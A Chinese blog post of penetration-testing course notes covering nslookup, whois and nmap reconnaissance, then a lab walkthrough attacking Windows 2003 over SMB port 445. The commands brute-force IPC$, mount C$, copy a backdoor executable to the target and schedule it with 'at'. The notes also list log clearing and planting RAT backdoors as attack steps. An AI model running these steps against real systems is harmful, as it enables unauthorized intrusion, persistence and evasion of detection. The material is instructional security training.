渗透测试基本知识


一、渗透的基本步骤

1. 授权

某个公司同意你进行渗透测试,这就叫授权;否则就是非法的。

2. 信息收集

nslookup

  • 作用:用于查询DNS的记录,查看域名解析是否正常,在网络故障的时候用来诊断网络问题
  • 直接查询:nslookup domain [dns-server]
C:\Users\>nslookup www.baidu.com
服务器:  ns.jxncptt.net.cn
Address:  202.101.224.69

非权威应答:
名称:    www.a.shifen.com
Addresses:  112.80.248.76
          112.80.248.75
Aliases:  www.baidu.com
  • 查询其他记录:nslookup -qt=type domain [dns-server]
直接查询返回的是A记录,我们可以指定参数,查询其他记录,例如 MX 等。
其中,type可以是以下这些类型:
	A 地址记录
	AAAA 地址记录
	AFSDB Andrew文件系统数据库服务器记录
	ATMA ATM地址记录
	CNAME 别名记录
	HINFO 硬件配置记录,包括CPU、操作系统信息
	ISDN 域名对应的ISDN号码
	MB 存放指定邮箱的服务器
	MG 邮件组记录
	MINFO 邮件组和邮箱的信息记录
	MR 改名的邮箱记录
	MX 邮件服务器记录
	NS 名字服务器记录
	PTR 反向记录
	RP 负责人记录
	RT 路由穿透记录
	SRV TCP服务器信息记录
	TXT 域名对应的文本信息
	X25 域名对应的X.25地址记录
C:\Users\>nslookup -qt=mx baidu.com 114.114.114.114
服务器:  public1.114dns.com
Address:  114.114.114.114

非权威应答:
baidu.com       MX preference = 20, mail exchanger = jpmx.baidu.com
baidu.com       MX preference = 15, mail exchanger = mx.n.shifen.com
baidu.com       MX preference = 20, mail exchanger = mx50.baidu.com
baidu.com       MX preference = 10, mail exchanger = mx.maillb.baidu.com
baidu.com       MX preference = 20, mail exchanger = mx1.baidu.com
baidu.com       MX preference = 20, mail exchanger = usmx01.baidu.com
  • 查询更具体的信息:nslookup –d [其他参数] domain [dns-server]
    只要在查询的时候,加上-d参数,即可查询域名的缓存。

whios

  • 作用:Linux/Unix环境下的命令,用来查找并显示指定用户账号、域名相关信息,包括域名注册时间、拥有者、邮箱等
  • 语法:whois[选择参数][必要参数]
-a  搜寻所有数据库
-c  找到最小的包含一个 mnt-irt 属性的匹配
-d  同时返回 DNS 反向查询的代理对象(需支持RPSL协议)
-F  快速输出原始数据
-H  隐藏法律声明内容
-i ATTR 进行一次反向查询
-l  将精确度降低一级的查询 (需支持RPSL协议)
-L  找到所有低精确度匹配
-m  找到第一级较高精确度匹配
-M  找到所有较高精确度匹配
-r  查询联系信息时关闭递归查询
-R  显示本地域名对象副本
-x  精确匹配

-h[主机]  连接到指定 HOST 服务器
-p[端口] 连接到指定 PORT 端口
-t[类型]  查询指定类型对象头信息
-T[类型]  查找指定类型的对象
-v[类型]  查询指定类型对象冗余信息
-q [版本|类型] 查询特定的服务器信息(需支持RPSL协议)
1:显示指定用户信息
root@monkey:~# whois root
2:查询域名描述信息
root@monkey:~# whois baidu.com
3:查询域名信息
root@monkey:~# whois baidu.com
4:查询域名信息省略法律声明
root@monkey:~# whois -H baidu.com
5: 指定端口查询
root@monkey:~# whois -p 80 baidu.com

3. 扫描漏洞

namp

  • (1)作用:检测存活在网络上的主机(主机发现);检测主机上开放的端口(端口发现);检测相应的服务(服务发现);检测操作系统,硬件地址以及软件版本;检测脆弱性的漏洞(Nmap的脚本)
  • (2)语法:namp [参数] ip范围 端口
 -sS:TCP SYN扫描
​ -p:指定端口号进行扫描
​ -v: 显示扫描过程
​ -F:快速扫描
​ -Pn:禁止Ping扫描后,跳过主机发现的过程进行端口扫描
​ -A:全面的系统扫描,包括打开操作系统探测,版本探测,脚本扫描,路径跟踪
​ -sU:UDP扫描
​ -sT:TCP扫描
​ -sV:扫描系统版本和程序版本号检测
​ --script=vuln:全面的漏洞扫描
​ -n:禁止反向域名解析
​ -R:反向域名解析
​ -6:启用IPV6扫描
1.扫描指定IP开放端口
nmap -sS -p 端口号 -v ip
2、使用半开扫描,指定端口号1-65535,显示扫描过程--穿透防火墙扫描
nmap -Pn -A ip
3.服务器禁止ping命令,可以试一试-Pn,namp参数配合使用
4.漏洞扫描--使用vuln脚本进行全面的漏洞扫描
nmap -script=vuln ip
5.指纹识别扫描:扫描系统版本和程序版本号检测,并输出详细的信息
nmap - sV -v ip
  • (3)端口扫描状态

    • Opend:端口开启
    • Closed:端口关闭
    • Filtered:端口被过滤,数据没有到达主机,返回的结果为空,数据被防火墙过滤
    • Unfiltered:未被过滤,数据有到达主机,但是不能识别端口的当前状态
    • Open|filtered:开放或者被过滤,端口没有返回值,主要发生在UDP,IP,FIN,NULL和Xmas扫描中
    • Closed|filtered:关闭或者被过滤,只发生在IP,ID,dile扫描
  • (4)漏洞脚本扫描
    脚本保存位置:/usr/share/nmap/scripts,“script=”后的参数为脚本的名字
    官方脚本网址:https://svn.nmap.org/nmap/scripts/

    • wohis信息扫描 nmap --script=whois-domain 站点根域名
      使用whois脚本对站点进行whois信息查询,即域名注册信息
    • DNS解析爆破扫描 nmap --script=dns-brute 站点根域名
      使用DNS爆破脚本进行dns解析扫描,查找相关域名(子域名)
  • (5)扫描结果保存:将输出结果保存到指定文件

    • 保存为txt文件:nmap --script=dns-brute 站点 -oN test.txt
    • 保存为xml格式:nmap --script=dns-brute 站点 -oX test.xml
      xml格式需要用浏览器打开,查看结果

高级扫描

  1. 扫描出IIS漏洞,针对不同的版本进行攻击
  • 2003-IIS6.0
  • 2008-IIS7.0
  1. 扫描网站漏洞(挨个儿尝试各种漏洞:SQL注入、XSS等等)

4. 漏洞利用

5. 提权

一般是拿到对方的shell环境或者桌面环境,拿到对方的最高控制权;
然后做一些事情。

6. 消除痕迹

清除日志记录等

7. 留后门

便于下次再攻击(可以使用灰鸽子等软件制作后门)

8. 写渗透测试报告

二、445攻击

用Win XP(10.1.1.1/24)攻击Win 2003(10.1.1.2/24)

1. 扫描445端口

  • 使用nmap扫描
  • 手工探测端口号(在cmd中使用telnet)
telnet  目标主机IP  目标端口
# 探测10.1.1.1是否开启了445端口
telnet 10.1.1.1 445

2. 445漏洞利用——IPC$

  • 暴力破解对方的账户密码:编写暴力破解字典
  • 使用 net use 命令
# 这条命令执行后,就表示我们可以操控对方了
net use f: \\10.1.1.2\ipc$ 密码 /user:用户
=================================================
# 一些补充的命令
net use f: \\10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
=================================================
  • 制作木马 (灰鸽子)–> 留后门
  • 植入木马
# 将木马程序拷到对方的C盘根目录下
copy d:\backdoor.exe \\10.1.1.2\c$
  • 设置计划任务自动执行木马,等待被攻击者上线
# 让对方(10.1.1.2)在11:11时执行后门程序
net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\backdoor.exe"

【千锋】网络安全300集笔记P44-46

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值